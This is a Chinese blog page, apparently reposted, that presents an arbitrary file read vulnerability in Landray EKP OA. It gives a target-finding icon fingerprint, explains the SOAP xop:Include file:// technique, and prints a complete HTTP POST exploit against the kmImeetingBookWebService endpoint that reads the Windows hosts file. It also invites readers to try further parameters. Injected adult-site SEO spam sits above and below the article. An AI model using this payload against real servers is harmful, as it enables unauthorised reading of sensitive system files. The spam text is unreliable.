人妻夜夜爽天天爽三区丁香花-人妻夜夜爽天天爽三-人妻夜夜爽天天爽欧美色院-人妻夜夜爽天天爽免费视频-人妻夜夜爽天天爽-人妻夜夜爽天天

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

藍(lán)凌OA任意文件讀取漏洞

admin
2025年1月9日 19:48 本文熱度 218
0x01.技術(shù)文章僅供參考學(xué)習(xí),請勿使用本文中所提供的任何技術(shù)信息或代碼工具進(jìn)行非法測試和違法行為。若使用者利用本文中技術(shù)信息或代碼工具對任何計(jì)算機(jī)系統(tǒng)造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé)。本文所提供的技術(shù)信息或代碼工具僅供于學(xué)習(xí),一切不良后果與文章作者無關(guān)。使用者應(yīng)該遵守法律法規(guī),并尊重他人的合法權(quán)益。

0x02 簡介
藍(lán)凌EKP由深圳市藍(lán)凌軟件股份有限公司自主研發(fā),是一款全程在線數(shù)字化OA,應(yīng)用于大中型企業(yè)在線化辦公,包含流程管理、知識管理、會議管理、公文管理等等。藍(lán)凌0A的thirdImSyncForKKWebService接口存在任意文件讀取漏洞。攻擊者可利用漏洞獲取系統(tǒng)敏感信息。
0x03 指紋信息
web.icon=="302464c3f6207d57240649926cfc7bd4"
0x04 漏洞復(fù)現(xiàn)
在上一篇文章中分析說了任意文件讀取接口不止那一處,因?yàn)樗斐扇我馕募x取的不是像我們之前常見的filename,path,url這種。而是觸發(fā)漏洞的是soap中包含了xop:Include標(biāo)簽,也就是我可以在poc中的任意位置插入paylaod。
SOAP 的 XOP 擴(kuò)展:
SOAP 的 XOP 擴(kuò)展:xop:Include 是 SOAP 附件優(yōu)化機(jī)制(XML-binary Optimized Packaging)。如果服務(wù)器端 SOAP 框架支持 XOP,并未禁用 file:// 協(xié)議,它可能會嘗試解析 href 指向的文件內(nèi)容。觸發(fā)條件:如果服務(wù)器端解析 SOAP 的 type 字段時(shí),遇到 xop:Include 的 href 屬性,會調(diào)用底層的 URI 解析方法(如 new URL().openStream()),加載指定文件。
那么還有另外的幾個webservice接口中也是存在任意文件讀取漏洞的。kmImeetingBookWebService接口,觸發(fā)漏洞的參數(shù)是count,其實(shí)也就是說在任意的service接口中帶有count參數(shù)或者type參數(shù)都能夠觸發(fā)漏洞。回顯還是正常的base64數(shù)據(jù)需要解密就能或者到數(shù)據(jù)了。
漏洞payload
POST /sys/webservice/kmImeetingBookWebService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SESSION=MmM1ZWZjYWQtZDQ1Mi00NWU3LWI4ZmMtNmQwY2UyYWRkNzEzConnection: close closeContent-Type: multipart/related; boundary=----oxmmdmlnvlx08yluof5qSOAPAction: Content-Type: text/xml;charset=UTF-8Host: Content-Length: 597------oxmmdmlnvlx08yluof5qContent-Disposition: form-data; name="111"<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.imeeting.km.kmss.landray.com/">   <soapenv:Header/>   <soapenv:Body>      <web:getImeetingBook>         <arg0>            <!--type: string-->            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:\Windows\System32\drivers\etc\hosts"/></count>         </arg0>      </web:getImeetingBook>   </soapenv:Body></soapenv:Envelope>------oxmmdmlnvlx08yluof5q--
其實(shí)還有好幾個參數(shù)都存在大家可以去試試?


閱讀原文:原文鏈接


該文章在 2025/1/10 10:34:51 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉儲管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 久久五月精品视频 | 少妇啪啪AV一区二区三区 | 久久国产自偷自免费一区 | 国产成人精品电影在线观看网址 | 久久久国产精品天天影视 | 国产欧美日韩综合网 | 2024国语在线观看 | 久久久久久精品精品免费 | 2024国产精品福利在线观看 | 国产精品无码亚洲精品2024 | 久久综合草| av中文字幕不卡一区二区三区 | 熟女视频人妻欧美国产精品麻豆成人a | 国产不卡视频在线观看 | 欧美三级中文字幕在线观看 | 精品国产亚一区二区三区 | 久久久久亚洲精品中文字幕 | 久久无码人妻中文国产AV | 欧美亚洲日韩午夜激情影院 | 天天草夜夜草 天天日导航 天天草综合 | 伊人久久亚洲精品一区 | 小13箩利洗澡无码自慰网站 | 国产精品无码一区二区无人区 | 亚洲精品视频麻豆 | 欧美老熟妇又粗又大 | 美女久久亚洲 | 91手机看片国产永久免费 | 都市人妻古典武侠另类校园 | 丁香五月天婷婷激情亚洲综 | 国产一区二区三区99视频 | 乱肉杂交怀孕系列小说BL | 国产精品人妻无码 | 精品人妻中文字幕乱码 | 69堂无码国产精品色四婷婷专区 | 欧美女视频网站大全在线观看 | 国产亚洲精品第一区香蕉 | 91麻豆国产在线观看 | 国产成人无码aⅴ片在线观看视频 | 精品动漫一区二区无遮挡 | 北条麻妃一区二区三区 | 欧美日韩国产综合在线高清视频 |